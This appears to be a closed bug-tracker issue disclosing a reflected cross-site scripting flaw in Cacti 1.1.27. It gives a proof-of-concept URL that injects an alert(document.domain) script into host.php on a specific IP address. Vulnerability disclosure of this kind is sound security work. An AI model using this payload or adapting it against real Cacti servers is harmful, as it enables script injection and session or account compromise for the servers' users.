Closed
Description
We (worlak2 and cibvetr2) found Reflected XSS vuln in last version 1.1.27.(For example we found in Google host with last version of cacti)
PoC
1)http://128.65.97.6/host.php/gahv8'-alert(document.domain)-'w6vt7??host_status=-1&host_template_id=-1&site_id=-1&poller_id=-1&rows=-1&filter=&

With regards worlak2 and cibvetr2